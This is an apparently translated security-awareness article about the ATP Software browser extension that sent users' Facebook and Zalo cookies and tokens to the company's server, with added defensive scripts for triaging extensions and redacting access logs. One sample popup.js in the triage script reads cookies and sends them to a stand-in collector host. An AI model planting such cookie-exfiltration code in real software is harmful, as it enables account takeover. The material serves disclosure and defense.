From the ATP software incident, beware of potentially harmful extensions


by Editor

In late June and early July 2023, the Anti-Phishing team (CLĐ) had a dispute with ATP Software over ATP's extension collecting the cookies of users' Facebook and Zalo logins. What is the harm in collecting such information? The article below explains.

Extension of ATP

The ATP extension is a browser extension for quickly retrieving cookies from Facebook and Zalo. It is not available in the extension stores of browsers such as Edge and Chrome, so users are forced to download and install it manually.

A technical member of the CLĐ team, Chi Tran, has written a technical analysis of ATP's extension; you can see the details at This.

Basically, this extension contains a suspicious piece of code in the popup.js file that steals user cookies through the following process:

  • Steal tokens through the extension
  • Combine the tokens into one batch and push it to token[.]atpsoftware[.]vn
  • These Facebook and Zalo tokens can be abused in seeding tools sold on the market

Screenshot: the code checks whether you are visiting Facebook or Zalo.

Screenshot: the code pushes the tokens to ATP Software's server.
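The process above is the pattern a reviewer looks for when triaging an extension that was installed outside the store: a script that reads browser cookies and also talks to an external host. The following Node.js script is an added example, not code from the article or from ATP Software; it runs a crude static check over an unpacked extension's manifest.json and scripts. The manifest, the two sample popup.js variants, the host names (collector.example.invalid, social.example) and the permission lists it flags are all constructed for the example.

```javascript
// Added example (not from the article or ATP Software): static triage of an
// unpacked browser extension for the "reads cookies and sends them out" pattern.
// All inputs below are constructed samples.

// Constructed manifest: asks for the cookies permission and access to all sites.
const SAMPLE_MANIFEST = JSON.stringify({
  manifest_version: 3,
  name: "Cookie helper (constructed sample)",
  permissions: ["cookies", "tabs"],
  host_permissions: ["<all_urls>"],
  action: { default_popup: "popup.html" },
});

// Constructed popup.js showing the risky pattern: cookies are read and shipped
// to a remote host inside a URL query parameter.
const SAMPLE_RISKY_JS = `
chrome.cookies.getAll({ domain: ".social.example" }, (cookies) => {
  const blob = cookies.map((c) => c.name + "=" + c.value).join("; ");
  fetch("https://collector.example.invalid/api?token=" + encodeURIComponent(blob));
});
`;

// Constructed popup.js that keeps the data on the client: it reads cookies for
// display only and never contacts a server.
const SAMPLE_CLIENT_ONLY_JS = `
chrome.cookies.getAll({ domain: ".social.example" }, (cookies) => {
  document.getElementById("out").textContent = cookies.map((c) => c.name).join(", ");
});
`;

const SENSITIVE_PERMISSIONS = new Set(["cookies", "webRequest", "history", "tabs"]);
const BROAD_HOST_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Literal URLs only; obfuscated or dynamically built URLs need dynamic analysis.
function extractUrls(js) {
  return js.match(/https?:\/\/[^\s"'`)]+/g) || [];
}

// Script-level findings: cookie access combined with an outbound call, and
// cookie access combined with a URL that already carries a query string.
function triageScript(name, src) {
  const findings = [];
  const readsCookies = /chrome\.cookies\.(getAll|get)\b|document\.cookie/.test(src);
  const sendsOut = /\b(fetch|XMLHttpRequest|sendBeacon)\b/.test(src);
  const urls = extractUrls(src);
  const queryUrls = urls.filter((u) => u.includes("?"));
  if (readsCookies && sendsOut && urls.length > 0) {
    findings.push({ level: "high", msg: `${name}: reads cookies and sends data to ${urls.join(", ")}` });
  }
  if (readsCookies && queryUrls.length > 0) {
    findings.push({
      level: "high",
      msg: `${name}: cookie data may be placed in a GET query string (${queryUrls.join(", ")}), which web servers write to their access logs`,
    });
  }
  return findings;
}

// Manifest-level notes plus script-level findings for every script supplied.
function triageExtension(manifestJson, scripts) {
  const manifest = JSON.parse(manifestJson);
  const findings = [];
  for (const p of manifest.permissions || []) {
    if (SENSITIVE_PERMISSIONS.has(p)) findings.push({ level: "info", msg: `requests the '${p}' permission` });
  }
  for (const h of manifest.host_permissions || []) {
    if (BROAD_HOST_PATTERNS.has(h)) findings.push({ level: "info", msg: `host access to every site (${h})` });
  }
  for (const [name, src] of Object.entries(scripts)) findings.push(...triageScript(name, src));
  return findings;
}

// "high" if any script-level finding, "review" if only permission notes, else "clean".
function verdict(findings) {
  if (findings.some((f) => f.level === "high")) return "high";
  return findings.length > 0 ? "review" : "clean";
}

for (const [label, js] of [["risky", SAMPLE_RISKY_JS], ["client-only", SAMPLE_CLIENT_ONLY_JS]]) {
  const findings = triageExtension(SAMPLE_MANIFEST, { "popup.js": js });
  console.log(`${label}: ${verdict(findings)}`);
  for (const f of findings) console.log(`  [${f.level}] ${f.msg}`);
}
```

The client-only variant still comes back as "review" rather than "clean": the manifest grants cookie access to every site, so a reviewer should still read the code even when no outbound call is visible. A pass from a check like this is not a proof of safety, only a quick filter before manual review.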

Immediately after the CLĐ team issued the above warning, a representative of ATP Software responded as follows:

  • The extension only supports users to retrieve cookies and tokens for their accounts on the browser
  • Pushing tokens to the server and displaying them on token[.]atpsoftware[.]vn is an SEO strategy of the company, to take advantage of the views (traffic) generated by the cookies and tokens to support SEO work.

After better understanding the intention and operation of this extension, the Anti-Fraud team identified many security risks to the safety of users' social network accounts and personal information when using this extension.

1. Processing of sending user tokens and cookies on the backend of the ATPsoftware server

  • Our Anti-Fraud Team confirms that this practice is not recommended for ensuring user information security; the processing could instead be handled entirely on the client side within the extension.
  • Team ATPsoftware has acknowledged this is a shortcoming and will move the processing entirely to the client side within the extension in the new updated version.

2. Storing and using user tokens and cookies on the server

  • The Anti-Fraud Team in particular, and users in general, cannot verify or control how user tokens and cookies are stored, used, exchanged or traded on the backend server, while cookies and tokens are sensitive information that can be used to take over accounts.
  • Team ATPsoftware once again affirmed that it does not intend to store or trade this data, but will also remove this part in the latest updated version to avoid misunderstandings and ensure information security for users.

3. Installing the extension

  • Normally, official extensions are installed through the browser's store. To be accepted into the store, an extension must meet certain standards intended to keep users safe. However, ATPsoftware's extension cannot be found in the official store and must be installed manually by the user.
  • ATPsoftware confirmed that this utility was originally used 100% within the company's own customer base for marketing. Because the team realized that Chrome does not support users installing it through the store, and because many add-ons still circulate on the market without going through the store, the team subjectively did not upload it to the store.
  • Team ATP has admitted it was completely wrong and guaranteed that it will fix this by rebuilding a new extension, correcting the security errors according to the Anti-Fraud team's comments, and uploading it to the store in the near future.

4. Legal issues of storing tokens and cookies

  • According to research and consultation with lawyers, Anti-Fraud determined that ATPSoftware violated a number of provisions of Decree 13/2023/ND-CP and Article 289 of the criminal law, because users' token and cookie data is extremely sensitive and can be misused.
  • Moreover, when this data is called back to token[.]atpsoftware[.]vn using the GET method, the parameters carrying the data are written to the access log of the web server at IP 45.77.47.127; this means the user's tokens and cookies have been stored on the server.
  • ATPsoftware has fully admitted that this problem was its fault: the ATP dev team lacked knowledge of security and server administration and did not know that using the GET method on the path would cause the access history to store a link containing the sensitive information.
  • But for the ATP team, this is really a problem of lacking information security knowledge, not an intention to save customers' cookies/extensions.
  • This is an unintended flaw, and ATPsoftware has admitted mistakes in the software construction stage due to a lack of knowledge in managing technical staff when programming software. Team ATP will fix the vulnerability and resolve this problem as soon as possible.
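The access-log point above is the one most often missed: an application that never writes the parameter to a database still leaves it on disk, because both Apache's "combined" log format and nginx's default log format record the full request line, query string included. The following Node.js script is an added example, not from the article; it scans combined-format log lines for sensitive query parameters and produces a redacted copy. The log lines, the IP addresses (from the 203.0.113.0/24 documentation range), the /api/collect path and the parameter names in SENSITIVE_PARAMS are constructed for the example.

```javascript
// Added example (not from the article): find and redact secrets that a GET
// callback has left in a web server's access log. Lines, addresses and
// parameter names are constructed samples.

const SAMPLE_ACCESS_LOG = [
  // GET with the data in the query string: the token lands in the log as-is.
  '203.0.113.10 - - [02/Jul/2023:10:15:01 +0700] "GET /api/collect?token=tok_abc123secret&cookie=sid%3Dabc123 HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
  // Ordinary page request.
  '203.0.113.11 - - [02/Jul/2023:10:15:05 +0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  // Same endpoint called with POST: the body is not part of the request line.
  '203.0.113.12 - - [02/Jul/2023:10:15:09 +0700] "POST /api/collect HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
];

// Parameter names treated as secrets; extend with the application's own names.
const SENSITIVE_PARAMS = /^(token|access_token|cookie|cookies|session|auth|password)$/i;

// Pull method and request target out of a combined-format line.
function parseRequestLine(line) {
  const m = line.match(/"(GET|POST|PUT|PATCH|DELETE|HEAD) (\S+) HTTP\/[\d.]+"/);
  return m ? { method: m[1], target: m[2] } : null;
}

// Names of sensitive query parameters present in a request target.
function leakedParams(target) {
  const q = target.indexOf("?");
  if (q < 0) return [];
  const params = new URLSearchParams(target.slice(q + 1));
  return [...params.keys()].filter((k) => SENSITIVE_PARAMS.test(k));
}

// One hit per line whose request target carries a sensitive parameter.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseRequestLine(line);
    if (!req) continue;
    const leaked = leakedParams(req.target);
    if (leaked.length > 0) hits.push({ method: req.method, target: req.target, params: leaked });
  }
  return hits;
}

// Rewrite a line so sensitive parameter values are replaced before the log is
// retained or shared; the original values cannot be recovered from the output.
function redactLine(line) {
  const req = parseRequestLine(line);
  if (!req) return line;
  const q = req.target.indexOf("?");
  if (q < 0) return line;
  const params = new URLSearchParams(req.target.slice(q + 1));
  for (const k of [...params.keys()]) {
    if (SENSITIVE_PARAMS.test(k)) params.set(k, "REDACTED");
  }
  return line.replace(req.target, req.target.slice(0, q) + "?" + params.toString());
}

for (const hit of scanAccessLog(SAMPLE_ACCESS_LOG)) {
  console.log(`${hit.method} ${hit.target} leaks: ${hit.params.join(", ")}`);
}
console.log(redactLine(SAMPLE_ACCESS_LOG[0]));
```

Only the first line is flagged: the POST to the same endpoint shows that moving the data into the request body keeps it out of the default access log, but that only removes one copy. The article's actual recommendation, processing the cookies entirely on the client side, is the one that leaves no copy on the server at all.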

Warning to users

Currently there are many add-on extensions from many different sources, supporting users with many different tasks, but most ordinary users do not really pay attention to safety when using these utilities.

Since 2020, security experts have warned that a series of Chrome browser extensions contain malicious code that threatens the security of users' information. These malicious codes, masquerading as utilities, target information such as user account login data, serving hackers' attacks on financial systems, healthcare or government organizations.

Last June, a security expert continued to warn about 34 Chrome browser extensions containing malicious code that steals personal information, posing a risk of data loss for 87 million users globally.

The case of ATPsoftware is not only another warning bell for users to protect sensitive personal information from the dangers lurking on their own devices, but also a warning to programmers and business managers about the importance of ensuring information security, and of knowledge about this issue, if they do not want their products to become tools for hackers.

To protect you in the online environment, Anti-Phishing would like to give some advice on using browser extensions.

  • DO NOT manually install extensions that are not available in the browser's store.
  • You should NOT use extensions that handle sensitive personal information if you do not really understand how they work.
  • DO NOT install extensions that you do not understand.
  • You SHOULD consult and ask questions of people knowledgeable about information security before installing.
